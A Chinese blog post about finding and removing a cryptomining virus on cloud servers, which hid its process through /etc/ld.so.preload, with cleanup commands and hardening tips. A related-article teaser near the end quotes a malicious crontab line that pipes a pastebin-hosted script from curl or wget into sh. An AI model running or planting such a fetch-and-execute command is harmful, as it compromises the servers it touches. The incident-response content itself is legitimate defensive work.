云服务器怎么清理系统盘,云服务器中挖矿病毒的清除过程

最新推荐文章于 2025-03-21 16:30:27 发布
最新推荐文章于 2025-03-21 16:30:27 发布
阅读量445 收藏
点赞数
文章标签: 云服务器怎么清理系统盘

背景

发现云上的两台ECS服务器CPU占用率过高,重启后依然如此。

使用top命令查看很奇怪:CPU虽然两个核占用100%,但是进程中没有看到占用CPU的进程,使用ps命令也看不出异常。似乎进程被隐藏了。

d4b3d87fdc51

image.png

诊断

改用busybox top命令,能发现被隐藏的进程,叫/bin/daemon

d4b3d87fdc51

Snipaste_2021-07-23_18-07-40.png

查看/bin/deamon被修改的时间,发现是几个月前的夜里02:55,很可疑

同目录被修改的,还有一个文件/bin/config.json文件,其内容为

d4b3d87fdc51

image.png

查了域名,是个矿池网站,所以显然这是个挖矿病毒

d4b3d87fdc51

image.png

为什么top命令看不到这个进程呢,因为/etc/ld.so.preload被修改了,让top和ps命令把关键进程都隐藏了

cat /etc/ld.so.preload

# 内容:

/usr/local/lib/uncompress.so

但是无法直接编辑此文件

解决

接下来就是删除相关文件了

恢复top命令

首先解决/etc/ld.so.preload被修改的问题,但是此文件只读,无法编辑,使用lsattr查看发现被保护了,因此使用chattr解除保护。

# 查看文件属性,被保护

lsattr /etc/ld.so.preload

----ia--------e--- /etc/ld.so.preload

# 解除保护

chattr -ia /etc/ld.so.preload

# 查看文件属性,保护已经解除

lsattr /etc/ld.so.preload

--------------e--- /etc/ld.so.preload

这里可能会出现一个情况:chattr和lsattr命令运行了没反应,或者提示没有权限,此时用ll查看这两个命令文件,发现是空文件

ll /usr/bin/chattr

-rw-r--r-- 1 root root 0 Feb 2 03:13 /usr/bin/chattr

如果出现这种情况,需要从另一台同样操作系统的服务器恢复这两个文件到此服务器,具体参考服务器中毒导致的wget等系统命令失效后的恢复

随后编辑内容,去除其中的注入文件,保存退出

vim /etc/ld.so.preload

# 删除其中的内容

此时使用top命令,可以看到进程

d4b3d87fdc51

Snipaste_2021-07-23_18-07-58.png

删除病毒文件

杀掉病毒进程

kill -9 2420

删除病毒文件

chattr -ia /bin/daemon

rm /bin/daemon

chattr -ia /usr/local/lib/uncompress.so

rm /usr/local/lib/uncompress.so

防范

目前还不清楚病毒是如何注入的,亡羊补牢,先做一些防范措施包括

清除.ssh/authorized_keys文件中不明来历的key

取消/usr/bin/curl和/usr/bin/wget的执行权限

征昊
关注
一次挖矿病毒的排查过程
邓邓子的博客
06-06 583
由于重启前后,相关命令如ps、ls等都无法使用,最后重装系统!清除异常任务,重启服务器。
挖矿病毒解决实例(隐藏进程,文章较好)(入侵)
热门推荐
墨痕诉清风的博客
01-06 1万+
CPU起飞了 最近有朋友在群里反馈,自己服务器的CPU一直处于高占用状态,但用top、ps等命令却一直找不到是哪个进程在占用,怀疑中了挖矿病毒,急的团团转。 根据经验,我赶紧让他看一下当前服务器的网络连接,看看有没有可疑连接,果然发现了有点东西: 上Shodan查一下这IP地址: 反向查找,发现有诸多域名曾经解析到这个IP地址: 这是一个位于德国的IP地址,开放了4444,5555,7777等数个特殊的服务端口: 其中这位朋友服务器上发现的连接到的是7777端口,
清理服务器中的挖矿进程kswapd0 & tsm
MaggieTang0622的博客
11-25 1248
挖矿进程kswapd0&tsm清理
服务器c盘清理文件,云服务器c盘满了怎么清理
weixin_42465030的博客
08-09 1410
云服务器c盘满了怎么清理 内容精选换一换当您购买的弹性云服务器规格无法满足业务需要时,可参考本章节变更规格,升级vCPU、内存。对于部分类型的弹性云服务器,您还可以在变更规格时,更换弹性云服务器的类型。“XEN实例”变更为“KVM实例”,需先手动配置弹性云服务器,安装对应的驱动,然后再变更规格。否则,规格变更后的弹性云服务器不可用(操作系统可能无法启动)。“XEN实例”变更为“华为云帮助中心,为用...
清理阿里云服务器ECS的Linux服务器系统盘无故被占满的问题
weixin_33811539的博客
07-12 798
为什么80%的码农都做不了架构师?>>> ...
怎么清理文件缓存文件云服务器,服务器运行内存怎么清理缓存
weixin_30446969的博客
08-06 837
服务器运行内存怎么清理缓存 内容精选换一换系统长期运行后,free命令查看系统内存,发现剩余内存不足,大部分是buffers和cached。在 Linux 的内存管理中,buffer是Linux内存中的Buffer cache。cache是Linux内存中的Page cache。Buffer cache:主要是当系统对块设备进行读写的时候,对块进行数据缓存的系统来使用,即对块的操当您发现云服务器...
腾讯云linux 卸载数据盘,如何卸载腾讯云硬盘
weixin_32595533的博客
05-09 501
操作场景当您需要将磁盘属性为数据盘的弹性云硬盘挂载到另一台云服务器上使用时,您可以主动地从云服务器卸载该弹性云硬盘,并将其挂载到其他云服务器上。卸载弹性云硬盘并不会清除该硬盘上的数据。目前支持卸载磁盘属性为数据盘的弹性云硬盘,不可卸载系统盘和非弹性云硬盘。卸载云硬盘前需先执行umount(Linux)或脱机(Windows)操作,否则可能会导致该云服务器再次挂载弹性云硬盘时无法识别。前提条件卸载数...
挖矿病毒应急响应处置手册
最新发布
安全狐
03-21 966
通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下:服务器或PC访问过不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的地址下载初始化程序,而不受信任的来源主要是:第三方情报结构,企业内部历史数据沉淀。服务器或PC新增异常或恶意文件、进程或服务,并且大部分异常文件保存在服务器或PC的TMP目录中。服务器或PC的定时任务发生变更。
阿里云CPU占用率90%被植入挖矿木马的解决方法
qq_35692642的博客
03-14 5124
目录问题总结 问题 最近几日突然发现服务器CPU占用率满了 我一开始还没在意,但是当打开警告内容的时候心脏骤停 查了一下,发现应该是被别人植入木马挖矿了,使用top命令看了一下CPU占用,发现有个python进程cpu占用率直接拉满,而且总是定时启动,没法直接使用kill杀死进程 使用 vim /var/log/cron 查看了一下计划任务,果然不对劲 但是使用crontab -l查看,什么也没有 网上查了一下,发现可能是木马可能是从6379端口进来的,使用lsof -i:6379看了一下,几百
【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
weixin_54707168的博客
02-22 787
【安全攻防系列】教你如何 ssh暴力破解、捕捉短连接、清理挖矿病毒、盖茨木马和DDOS病毒
网站云服务器清理,云服务器内存怎么清理
weixin_32236415的博客
08-11 541
云服务器内存怎么清理 内容精选换一换您可以通过本节内容解决如下问题:用户在管理控制台执行弹性云服务器相关操作后出现异常,针对管理控制台提示的异常信息,应该如何处理?用户参见《弹性云服务器接口参考》调用云服务器相关的API接口时,如果返回错误码,应该如何处理?用户通过管理控制台执行弹性云服务器的相关操作后,弹性云服务器列表页面将显示相应操作的申请状态。通过申请状态中显示的信息在“资源使用详情”区域内...
如何检查清理 服务器系统盘
whiskylu的专栏
03-05 466
如何检查清理 服务器系统盘 1.清理不必要的系统用户。电脑属性--系统属性--用户配置文件--设置--“删除不必需的用户配置文件” 2.检查系统C盘:C:\Windows\System32\winevt路径下的系统日志文件。清理归档日志 ...
腾讯云linux数据盘格式化,腾讯云服务器分区及格式化数据盘
weixin_29605297的博客
05-12 333
腾讯云服务器分区及格式化数据盘当您购买了数据盘时,需要格式化才可使用。未购买数据盘的用户可以跳过此步骤。这里以CentOS为例进行说明。注意:仅支持对数据盘进行分区,不支持对系统盘进行分区。若您强行对系统盘分区可能导致系统崩溃等严重问题,针对此种情况腾讯云不承担赔偿责任。1) 通过步骤四介绍的方法登录Linux云服务器。2) 输入命令fdisk -l查看您的数据盘信息,注意:在没有分区和格式化数据...
Linux 库文件劫持
travelnight的博客
09-09 2594
Linux库文件劫持
linux服务器Centos7中病毒记录
on the way . . .
03-23 2955
Background 用的华为的弹性云服务器,直到这一次,之前已经出现过三四次,想到这一次也不会是最后一次,记录下,防止因为同样的问题再次中毒。 1、2022-03-23 中毒后部分系统命令不能用。有的能用的也会夹杂一些其他的错误信息。 ERROR: ld.so: object '/usr/local/lib/uncompress.so' from /etc/ld.so.preload cannot be preloaded: ignored. 中毒效果图 症状分析 由上图可以看出,加载/
记录一次云服务器被劫持下载了挖矿病毒的处理过程
黄嚯嚯
01-29 7017
etc被篡改导致系统中病毒 起因: 一年前买的阿里云服务器 , 买了没多久 , 因为没做什么安全措施 , 然后就莫名奇妙服务器被劫持 , 在上面下载了挖矿的一些脚本 ,当时做的处理方式 简单粗暴 直接重置了我的阿里云服务器 , 并且改了密码 , 同时在阿里云的服务器控制台 -> 安全组规则中 关掉了掉了脚本来源的IP地址的出入权限 , 之后的一年 都一直风平浪静 , 知道昨天 , 手贱 ,,,,, 觉得过去很久了 应该没啥了 , 就删掉了那条规则, 也就是等同于放开了那个IP对本机的...
Linux一次病毒处理
Beer_xiaocai的博客
01-08 519
CPU内存爆满,top命令无法显示异常进程
kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://p
weixin_33968104的博客
05-21 700
. 症状及表现CPU使用率异常高,外出流量异常crontab异常,存在如下定时任务(基本上就可以确定了)[root@mdw ~]# crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh12在...
服务器挖矿木马识别与清理
m0_65372269的博客
12-12 1192
挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响上的其他应用的正常运行。黑客为了得到更多的算力资源,一般都会对全网进行无差别扫描,同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点,在主机被成功入侵之后,挖矿木马还会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。
【转】服务器挖矿病毒的排查过程
05-25
服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表中留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的记录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值